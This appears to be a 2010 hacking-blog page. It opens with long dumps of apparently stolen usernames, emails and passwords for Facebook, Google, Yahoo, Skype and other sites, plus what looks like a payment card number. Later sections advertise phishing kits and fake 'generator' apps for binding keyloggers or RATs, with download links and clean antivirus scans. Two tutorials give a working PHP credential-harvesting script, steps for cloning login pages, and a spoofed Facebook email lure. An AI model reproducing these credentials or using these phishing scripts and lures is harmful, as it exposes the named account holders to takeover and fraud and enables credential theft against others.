Friday, May 7, 2010

Logs - 5-7-10

URL: http://www.amaderforum.com
USER: roshanprasath
PASSWORD: narayana

URL: https://login.facebook.com
USER: roshanprasath@yahoo.com
PASSWORD: narayana_21

URL: https://email.secureserver.net
USER: sundarajahj
PASSWORD: bhagavan007

URL: http://www.tamilspark.info
USER: roshanprasath
PASSWORD: narayana

URL: https://email.secureserver.net
USER: sundarajahj@medigain.com
PASSWORD: bhagavan007

URL: https://www.google.com
USER: jayprasath007@gmail.com
PASSWORD: bhagavan007

URL: http://www.tamilterminal.info
USER: roshanprasath
PASSWORD: narayana

URL: http://192.168.1.1
USER: admin
PASSWORD: admin

URL: http://192.168.1.1
USER: mtk2540932@sltadsl.lk
PASSWORD: 2540932

URL: http://192.168.2.1
USER: admin
PASSWORD: admin

URL: http://www.themes4urmobilephone.com
USER: jayprasath007@gmail.com
PASSWORD: y4DUrqonY7

URL: https://www.google.com
USER: rajprasath
PASSWORD: godsairam

URL: https://login.facebook.com
USER: roshanprasath@yahoo.com
PASSWORD: narayana_21

URL: http://hotfile.com
USER: roshanprasath
PASSWORD: narayana

URL: https://login.facebook.com
USER: pragash13@yahoo.com
PASSWORD: 0774527684

URL: http://www.masalatalk.com
USER: roshanprasath
PASSWORD: narayana

URL: https://twitter.com
USER: jayprasath007@gmail.com
PASSWORD: bhagavan007

URL: http://www.xboard.co.in
USER: roshanprasath
PASSWORD: narayana

URL: https://epay.sipg.lk
USER: 4910139944726568
PASSWORD: 358

URL: https://login.facebook.com
USER: jayprasath007@gmail.com
PASSWORD: bhagavan007

URL: https://login.facebook.com
USER: jayprasath007@gmail.com
PASSWORD: catchmeifyoucan007

URL: https://login.facebook.com
USER: jayprasath007@gmail.com
PASSWORD: catchmeifyoucan007

URL: https://login.facebook.com
USER: thusan.com@hotmail.co.uk
PASSWORD: s553911

URL: https://login.facebook.com
USER: rajprasath@gmail.com
PASSWORD: godsairam

URL: http://kualalumpur.ebuddy.com
USER: jayprasath007@hotmail.com
PASSWORD: catchmeifyoucan007

URL: http://austin.ebuddy.com
USER: jayprasath007@hotmail.com
PASSWORD: catchmeifyoucan007

URL: https://secure.skype.com
USER: roshanprasath
PASSWORD: narayana

URL: http://sms.dialog.lk
USER: 772292298
PASSWORD: narayana

URL: https://login.secureserver.net
PASSWORD: bhagavan007

URL: https://login.yahoo.com
USER: roshanprasath
PASSWORD: narayana_21

URL: http://daily-bb.com
USER: roshanprasath
PASSWORD: narayana

URL: http://www.newmasalaboard.info
USER: roshanprasath
PASSWORD: narayana

URL: http://careers.du.ae
USER: roshanprasath PASSWORD: 50d364a
---Saved Users & Passwords---
URL: https://login.facebook.com
USER: zhyte11@yahoo.com
PASSWORD: epsilon

URL: http://www.playdota.com
USER: hybriks
PASSWORD: epsilon

URL: http://www.pinoyunderground.com
USER: hybriks
PASSWORD: epsilon

URL: http://www.ulink.com.ph
USER: hybriks
PASSWORD: fa7922

URL: http://pinoyunderground.com
USER: hybriks
PASSWORD: epsilon

URL: http://www.filefactory.com
USER: zhyte11@yahoo.com
PASSWORD: epsilon

URL: https://login.facebook.com
USER: zhyte11@yahoo.com
PASSWORD: epsilon

URL: https://ssl.rapidshare.com
USER: travis_182
PASSWORD: asdfg

URL: https://ssl.rapidshare.com
USER: leechviet
PASSWORD: 1234563

URL: http://forums.ngemu.com
USER: zhyte
PASSWORD: epsilon

URL: http://www.suncellularclub.com
USER: zHYTe
PASSWORD: Epsilon

URL: http://suncellularclub.com
USER: zHYTe
PASSWORD: epsilon

URL: http://www.gempak.org
USER: hybriks
PASSWORD: epsilon

URL: https://login.facebook.com
PASSWORD: epsilonian

URL: http://bewareplastikpokame.webs.com
USER: zhyte11@yahoo.com
PASSWORD: epsilon

URL: http://www4.shoutmix.com
USER: hybriks
PASSWORD: epsilon

URL: http://www4.shoutmix.com
USER: zhyte
PASSWORD: epsilon

URL: https://ssl.rapidshare.com
USER: public
PASSWORD: public

URL: http://newoutlaw.org
USER: zhyte
PASSWORD: epsilon

URL: http://www.leegt-games.com
USER: zhyte11@yahoo.com
PASSWORD: epsilon

URL: https://login.yahoo.com
USER: zhyte11
URL: http://tehparadox.com
USER: Rollingvengeance
PASSWORD: hammertime

URL: https://login.facebook.com
USER: rollingvengeance460@yahoo.com
PASSWORD: hammertime

URL: http://www.kingdom-kvcd.net
USER: Brohelio
PASSWORD: theworld

URL: http://lobby.hexagon.cc
USER: Bariumingestion
PASSWORD: hammertorch

URL: https://register.facebook.com
USER: arniegrape82@yahoo.com
PASSWORD: hammertime

URL: https://login.facebook.com
USER: arniegrape82@yahoo.com
PASSWORD: hammertime

URL: https://login.facebook.com
USER: rollingvengeance390@yahoo.com
PASSWORD: hammertime

URL: https://login.facebook.com
USER: arniegrape82@yahoo.com
PASSWORD: hammertime

URL: https://login.facebook.com
USER: rollingvengeance351@yahoo.com
PASSWORD: hammertime

URL: https://login.facebook.com
USER: mangino7175@hotmail.com 
PASSWORD: man.7175

URL: http://signups.myspace.com
USER: arniegrape82@yahoo.com
PASSWORD: 1234asdf

URL: https://login.facebook.com
USER: rollingvengeance460@yahoo.com
PASSWORD: hammertime

URL: http://www.heartlandracing.net
USER: Mustakrakish
PASSWORD: murderfa

URL: http://www.dimeadozen.org
USER: Brohelio
PASSWORD: hammertime

URL: http://www.wiihacks.com
USER: Rollingvengeance
PASSWORD: hammertime

URL: https://www.google.com
USER: arniegrape82@yahoo.com
PASSWORD: hammertime

URL: http://www.vimeo.com
USER: arniegrape82@yahoo.com
PASSWORD: hammertime

URL: http://www.hdd-tools.com
USER: arniegrape82
PASSWORD: hammertime

URL: http://www.pogo.com
USER: mikeyxxlbrah
PASSWORD: fluffy

URL: http://zombtracker.the-zomb.com
USER: Brohelio
PASSWORD: hammertime
URL: https://login.yahoo.com
USER: arniegrape82@yahoo.com
PASSWORD: 1234asdf
PASSWORD: epsilonURL: https://www.google.com
USER: Maririspirit
PASSWORD: batousekce9

URL: https://login.facebook.com
USER: TopinasKorp@gmail.com
PASSWORD: batousekce9

URL: https://login.szn.cz
USER: Alien.g
PASSWORD: POLDA

URL: https://www.google.com
USER: Topinaskorp
PASSWORD: batousekae9

URL: http://www.uploadforum.net
USER: Maririspirit
PASSWORD: batousekce9

URL: http://forum.xbox-360-shop.info
USER: Batou
PASSWORD: polda

URL: http://www.warforum.cz
USER: Alien.g
PASSWORD: sony

URL: http://www.xbox360iso.com
USER: Maririspirit
PASSWORD: batousekce9

URL: http://www.romulation.net
USER: TopinasKorp
PASSWORD: batousekce9

URL: http://www.wiiso.com
USER: Maririspirit
PASSWORD: batousekce9

URL: http://www1.warforum.cz
USER: Alien.g
PASSWORD: sony

URL: http://www.pspiso.com
USER: Maririspirit
PASSWORD: batousekce9

URL: http://tehparadox.com
USER: Maririspirit
PASSWORD: batousekce9

URL: https://login.szn.cz
USER: Alien.g
PASSWORD: POLDA

URL: http://www.gamefaqs.com
USER: Topinaskorp@gmail.com
PASSWORD: batousekce9

URL: http://horrorflix.org
USER: TopinasKorp
PASSWORD: batousekce9

URL: http://www.playcentrum.cz
USER: Topinas
PASSWORD: batousekce9

URL: http://www.warcenter.cz
USER: Alien.g
PASSWORD: polda

URL: http://www.megavideo.com
USER: Topinaskorp
PASSWORD: batousekae9

URL: http://www.konzolista.cz
USER: Topinas
PASSWORD: polda

URL: http://forum.xbox-360-shop.info
USER: UncleBatou
PASSWORD: polda

URL: https://account.lego.com
USER: TopinasKorp
PASSWORD: batousekce9
APPLICATION : Firefox 3.5 (en-US)
URL         : http://twitter.com
USERNAME    : yajurkochhar@yahoo.co.in
PASSWORD    : 9868343550


APPLICATION : Firefox 3.5 (en-US)
URL         : http://wwwi.way2sms.com
USERNAME    : 9868343550
PASSWORD    : 5871


APPLICATION : Firefox 3.5 (en-US)
URL         : https://login.facebook.com
USERNAME    : yajurkochhar@yahoo.co.in
PASSWORD    : yajur007


APPLICATION : Firefox 3.5 (en-US)
URL         : http://www.dceforum.com
USERNAME    : yajurkochhar007
PASSWORD    : 9868343550


APPLICATION : Firefox 3.5 (en-US)
URL         : http://dceforum.com
USERNAME    : yajurkochhar007
PASSWORD    : 9868343550


APPLICATION : Firefox 3.5 (en-US)
URL         : http://wwwf.way2sms.com
USERNAME    : 9868343550
PASSWORD    : 5871


APPLICATION : Firefox 3.5 (en-US)
URL         : https://secure.imdb.com
USERNAME    : yajurkochhar@yahoo.co.in
PASSWORD    : 9868343550


APPLICATION : Firefox 3.5 (en-US)
URL         : http://wwwo.way2sms.com
USERNAME    : 9868343550
PASSWORD    : 5871


APPLICATION : Firefox 3.5 (en-US)
URL         : http://wwwd.way2sms.com
USERNAME    : 9868343550
PASSWORD    : 5871


APPLICATION : Firefox 3.5 (en-US)
URL         : http://dcetimes.org
USERNAME    : yajurkochhar
PASSWORD    : 9868343550










APPLICATION : Yahoo Messenger
URL         : 
USERNAME    : yajurkochhar

APPLICATION : Internet Exploler 
URL         : http://www.facebook.com/
USERNAME    : yajurkochhar@yahoo.co.in
PASSWORD    : yajur007

APPLICATION : Internet Exploler 
URL         : http://www.facebook.com/
USERNAME    : parulsharma0290@yahoo.in
PASSWORD    : 9868343550

URL: http://muj.idnes.cz
USER: Topinaskorp@gmail.com
PASSWORD: batousekce9URL: https://login.facebook.com
USER: qureshiesaif@hotmail.com
PASSWORD: devil987

URL: http://www.myfreecams.com
USER: hitgreatone
PASSWORD: fahoo987

URL: http://dbbians.com
USER: hitman2k11
PASSWORD: fahoo987

URL: http://www.masalatalk.com
USER: hitgreatone
PASSWORD: q2HuXwTK

URL: http://pinkdevils.yuku.com
USER: hitman2k11
PASSWORD: fahoo987

URL: https://login.yahoo.com
USER: hitgreatone
PASSWORD: rehman

URL: http://www.stickam.com
USER: qureshiesaif@hotmail.com
PASSWORD: fahoo987

URL: https://secure.skype.com
USER: hitman2k11
PASSWORD: fahoo987

URL: https://www.google.com
USER: hitman2k11
PASSWORD: fahoo987
URL: http://www.gamefaqs.com
USER: qureshiesaif@hotmail.com
PASSWORD: fahoo98
PASSWORD: 50d364a

Phish grabber

PHISH GRABBER -- This tool will try to brute directories and files for the password log.In short it will hijack someone elses phishing log and their "hard work".
OCX and premade work list is included



http://uploading.com/files/get/c723368b/

Super Phisher 1.0

This is a tool for begginners who dont know how to make phish page any site...

Turns any site into a phishing site Just upload the files in your free webhosting account with Php enable and you are ready to go!





http://www.mediafire.com/?z9g1d1etztn

Xbox Live Points Generator Phisher



Instructions:
-Upload all files to host.
(Make sure you make a new directory for js and upload the files that are inside the js folder.)
-Go Phish!

If you post on another site then please give me credit.

Enjoy.


http://rapidshare.com/files/178310609/XBL.Points.Generator.Phisher.Coded.by.regileX.Bl

Phish Creator

http://ifile.it/bnki2or/PhishcreateV2-mE%20KTO%20MA%20KOLLAJ%20OSHT%20QDO%20FAQE%20MUJSH%20ME%20BO.rar

Fake Application Pack

Fake Application Pack



Description

I have noticed a lot of fake applications on this forum and the whole one button one textbox one progressbar is starting to get boring. I have dedicated a lot of my time to create some applications for you to bind with your Keylogger/RAT/Bot or whatever you want to. The download is a Share Cash link but trust me, two minutes of filling out a survey is worth it.

Download


http://www.multiupload.com/4G9FJH6PN7
Modern Warfare 2 Hack Pack
Description - This application will ask the user to select the prestige they want, select the custom settings they want and select the scripts they want. It then gives them an authentication code and asks them to enter it into the Xbox Live marketplace.

Screenshot


Facebook Account Hacker


Description - This application will ask the user to enter the email of the victim and hit the "Retrieve Password" button. It will then show a progressbar for a minute and eventually give an error message for the password.

Screenshot


Demonoid Account Creator



Description - This application will first generate an Invite Code and then ask the user for a Username and Password. It then shows the loading image for a minute or so and says that the account has been created.

Screenshot


RsBot Auth Code Generator



Description - This application will ask the user to select the folder they saved the bot in, click patch, then select a website and select a script. Upon hitting generate, a random 'auth code' will appear.

Screenshot


Runescape Membership Pin Generator



Description - This application will simply generate random numbers and tell the user to wait 24 hours before usage.

Screenshot

iTunes $5000 Account Generator Phisher

Hello!

This is another Fake


Features:

Awesome music playing in background
Cool icons
Link to iTunes download location
Generate and submit buttons
Progress bar
Cool pic
100% FUD
FREE
You are allowed to bind your tools/rats/keyloggers/servers etc too it


Screenie:


Download:

RAR:


http://www.multiupload.com/ZOSLD58VM9
EXE:


http://www.multiupload.com/HAHT3CMJLN

Virus Scans:




File Info

Report date: 2010-03-15 21:53:03 (GMT 1)
File name: iTunes_Acc_Gen.rar
File size: 1437633 bytes
MD5 Hash: 64911d37ad981d38c9a77ab331c1198e
SHA1 Hash: b6fefb9686099130aa53d3e36fbcf25f2770946d
Detection rate: 0 on 21 (0%)
Status: CLEAN

Detections

a-squared - -
Avast - -
AVG - -
Avira AntiVir - -
BitDefender - -
ClamAV - -
Comodo - -
Dr.Web - -
Ewido - -
F-PROT6 - -
G-Data - -
Ikarus T3 - -
Kaspersky - -
McAfee - -
NOD32 - -
Panda - -
Solo - -
TrendMicro - -
VBA32 - -
VirusBuster - -
Zoner - -

Scan report generated by
NoVirusThanks.org

New FaceBook Phisher

In this tutorial im going to tell you have to make a fake login page.
This method works for most of the pages but i have chosen Facebook as an example.

Part 1:

First we create a PHP script that will save the passwords in a text file.

---Open notepad and put this code:



header ('Location: http://login.facebook.com ');
$handle = fopen("passwords.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
Now save this as phish.php


header ('Location: http://login.facebook.com ')
This URL is the url where the victim is redirected after logging in to you fake page.I have chosen the page where is the real login place because i didn't find where it say wrong password. And if someone find it let me know it please

Part 2:.

Now go there ; copy the code ; past it in a notepad and save it as " login.php "

Part 3 :

Upload these 2 files(login.php and phish.php) to a webhost that supports PHP and you ready to go.Just give your victim the link to your Login.php file and every time they login that php script will create a file named passwords.txt in the same directory as login.php and phish.php.Just open the password.txt and you will see the passwords.

The login.php link should be something like this:

http://faceb00kcomnphotophpid8268738....com/login.php

Just and example.

Dont click on this one,Its my fake login.

To make it more real, create an hotmail account like : facebooknotify@hotmail.com

Send a message to the victim. In the subject space, write something like


PersonName commented on a photo of you:

"Hey PersonName, come see my comment and click on my picture to see all my private pictures"


To see the comment thread, follow the link below:

http://www.facebook.com/n/?photo.php&p...mp;id=728929277

Thanks,
The Facebook Team
___
Want to control which emails you receive from Facebook? Go to:


http://www.facebook.com/editaccount.php?no....TYxODQ1NTgwMA==

http://www.facebook.com/n/?photo.php&pid=1935528&id=728929277
Select it and click on the hyperlink icon. In the hyperlink space, write your fake login page url.

Creating a Fake Log-In Page

Creating a fake log-in-page

Hi. In this tutorial im going to tell you have to make a fake login page.
This method works for most of the pages but i have chosen hi5 as an example.
Part 1:

First we create a PHP script that will save the passwords in a text file.

---Open notepad and put this code:


header ('Location: http://www.hi5.com/friend/login.do ');
$handle = fopen("passwords.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

Now save this as phish.php

Note:


header ('Location: http://www.hi5.com/friend/login.do ');
This URL is the url where the victim is redirected after logging in to you fake page.I have chosen the page where it says wrong password so the victim will think that he really wrote the password wrong and will just try again this time to the real hi5 page.

Note 2:
If you are smart you should change


$handle = fopen("passwords.txt", "a");
to


$handle = fopen("laughingmyassoffgrandpa.txt", "a");
So nobody can guess that it's a phishing website. Otherwise everybody can look at it by writing

/passwords.txt
. you know?

Part 2:.

Now we go to


www.hi5.com

and right click / View Source.
Now we need to find this part of source:
action=someurl.com

In this case we have:


action="/friend/login.do"
We replace that part with:


action="phish.php"
And save this file as login.php.

Upload these 2 files(login.php and phish.php) to a webhost that supports PHP and you ready to go. Just give your victim the link to your Login.php file and every time they login that php script will create a file named passwords.txt in the same directory as login.php and phish.php. Just open the password.txt and you will see the passwords.

Enjoy!

Paypal Money Generator Phisher

Features:[/B]
  • Text-To-Speech (On Open - It explains the use of the program and the responsibility of the maker)
  • Money Amount
  • Help Section


Preview:

(Main Menu)



Virus Scan

File Info

Report date: 2010-03-15 20:41:21 (GMT 1)
File name: Paypal_Hack.exe
File size: 83456 bytes
MD5 Hash: 27952e34077c23a89f49b7fe9345e1ad
SHA1 Hash: 1e2649dcabba004f98d0bd0065fc4758f7beac46
Detection rate: 0 on 21 (0%)
Status: CLEAN

Detections

a-squared - -
Avast - -
AVG - -
Avira AntiVir - -
BitDefender - -
ClamAV - -
Comodo - -
Dr.Web - -
Ewido - -
F-PROT6 - -
G-Data - -
Ikarus T3 - -
Kaspersky - -
McAfee - -
NOD32 - -
Panda - -
Solo - -
TrendMicro - -
VBA32 - -
VirusBuster - -
Zoner - -

Scan report generated by
NoVirusThanks.org


Download

http://www.multiupload.com/4EF26F4XQN

Cardable sitez...

This summary is not available. Please click here to view the post.